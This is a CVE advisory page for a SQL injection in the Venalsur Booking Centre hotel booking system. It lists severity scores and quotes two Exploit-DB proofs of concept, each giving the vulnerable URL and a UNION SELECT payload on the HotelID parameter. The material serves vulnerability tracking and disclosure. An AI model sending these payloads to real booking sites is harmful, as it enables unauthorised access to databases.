CVE-2008-6809
published 2009-05-18CVE-2008-6809: SQL injection vulnerability in hotel_habitaciones.php in Venalsur Booking Centre Booking System for Hotels Group 2.01 allows remote attackers to execute…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.98%
57.8th percentile
SQL injection vulnerability in hotel_habitaciones.php in Venalsur Booking Centre Booking System for Hotels Group 2.01 allows remote attackers to execute arbitrary SQL commands via the HotelID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bookingcentre | booking_system_for_hotels_group | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
V.H.S. Booking - 'hotel_habitaciones.php?HotelID' SQL Injection
exploitdb·2009-12-17
CVE-2008-6809 V.H.S. Booking - 'hotel_habitaciones.php?HotelID' SQL Injection
V.H.S. Booking - 'hotel_habitaciones.php?HotelID' SQL Injection
---
[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
[~] Vendor: www.bookingcentre.eu
[*] Software: Hotels Group
[*] author: ((R3d-D3v!L))
[*] Date: 18.dec.2009
[*] T!ME: 12:00 am
[?] Home: WwW.xP10.ME
[?] contact: N/A
[?]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
[*] Err0r C0N50L3:
http://server/www_en/hotel_habitaciones.php?HotelID=(SQL)
[~] (SQL):
1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
! GAZA !N 0uR HEART's blood and M!ND
[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}---------------------
Exploit-DB
Booking Centre 2.01 - 'HotelID' SQL Injection
exploitdb·2008-11-27
CVE-2008-6809 Booking Centre 2.01 - 'HotelID' SQL Injection
Booking Centre 2.01 - 'HotelID' SQL Injection
---
[~] ----------------------------بسم الله الرØÙ…Ù† الرØÙŠÙ…------------------------------
[~]Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
[~]Vendor: www.bookingcentre.eu
[~]Software: Hotels Group
[~]author: ((Ñ3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~] Exploit:
http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL)
[~] (SQL):
1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
[~]--------------------------------------------------------------------------------
[~] Greetz tO: keta & m4n0n & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & Ø
No writeups or analysis indexed.
http://secunia.com/advisories/32430http://www.securityfocus.com/bid/32512https://exchange.xforce.ibmcloud.com/vulnerabilities/46913https://www.exploit-db.com/exploits/7253http://secunia.com/advisories/32430http://www.securityfocus.com/bid/32512https://exchange.xforce.ibmcloud.com/vulnerabilities/46913https://www.exploit-db.com/exploits/7253
2009-05-18
Published